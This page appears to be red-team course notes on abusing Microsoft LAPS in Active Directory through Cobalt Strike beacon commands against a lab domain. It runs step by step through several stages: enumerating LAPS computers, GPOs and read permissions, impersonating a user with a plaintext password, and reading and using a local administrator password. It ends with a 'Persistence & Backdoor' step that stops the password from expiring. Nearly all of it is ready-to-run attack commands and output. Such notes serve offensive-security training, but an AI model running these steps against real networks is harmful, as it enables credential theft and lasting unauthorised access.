LAPS

# List computers that have ms-mcs-admpwdexpirationtime flag not null
beacon> powershell Get-DomainObject -SearchBase "LDAP://DC=dev,DC=cyberbotic,DC=io" | ? { $_."ms-mcs-admpwdexpirationtime" -ne $null } | select DnsHostname

# Computers which have laps
beacon> ls C:\Program Files\LAPS\CSE

 Size     Type    Last Modified         Name
 ----     ----    -------------         ----
 145kb    fil     09/22/2016 08:02:08   AdmPwd.dll
 
# OR if LAPS cmdlets installed
beacon> powershell Get-Command *AdmPwd*
beacon> powershell Find-AdmPwdExtendedRights -Identity Workstations | fl
beacon> powershell Get-AdmPwdPassword -ComputerName wkstn-2 | fl
# Search for GPO related to laps
beacon> powershell Get-DomainGPO | ? { $_.DisplayName -like "*laps*" } | select DisplayName, Name, GPCFileSysPath | fl

# Download
beacon> download \\dev.cyberbotic.io\SysVol\dev.cyberbotic.io\Policies\{4A8A4E8E-929F-401A-95BD-A7D40E0976C8}\Machine\Registry.pol

# Extract Information
# https://github.com/PowerShell/GPRegistryPolicyParser
PS C:\Users\Administrator\Desktop> Parse-PolFile .\Registry.pol
# Find principales which have read permission on ms-Mcs-AdmPwd flag
powershell Get-DomainObjectAcl -SearchBase "LDAP://OU=Workstations,DC=dev,DC=cyberbotic,DC=io" -ResolveGUIDs | ? { $_.ObjectAceType -eq "ms-Mcs-AdmPwd" -and $_.ActiveDirectoryRights -like "*ReadProperty*" } | select ObjectDN, SecurityIdentifier

ObjectDN                                              SecurityIdentifier
--------                                              ------------------
OU=Workstations,DC=dev,DC=cyberbotic,DC=io            S-1-5-21-3263068140-2042698922-2891547269-1125
CN=WKSTN-1,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-3263068140-2042698922-2891547269-1125
CN=WKSTN-2,OU=Workstations,DC=dev,DC=cyberbotic,DC=io S-1-5-21-3263068140-2042698922-2891547269-1125

beacon> powershell ConvertFrom-SID S-1-5-21-3263068140-2042698922-2891547269-1125
DEV\1st Line Support

beacon> make_token DEV\jking Purpl3Drag0n
beacon> powershell Get-DomainObject -Identity wkstn-2 -Properties ms-Mcs-AdmPwd

ms-mcs-admpwd 
------------- 
P0OPwa4R64AkbJ

beacon> make_token .\lapsadmin P0OPwa4R64AkbJ
beacon> ls \\wkstn-2\c$

Persistence & Backdoor

beacon> powershell Set-DomainObject -Identity wkstn-2 -Set @{"ms-mcs-admpwdexpirationtime"="232609935231523081"}

beacon> powershell Get-DomainObject -Identity wkstn-2 -Properties ms-mcs-admpwdexpirationtime
PreviousProcess InjectionNextAppLocker

Last updated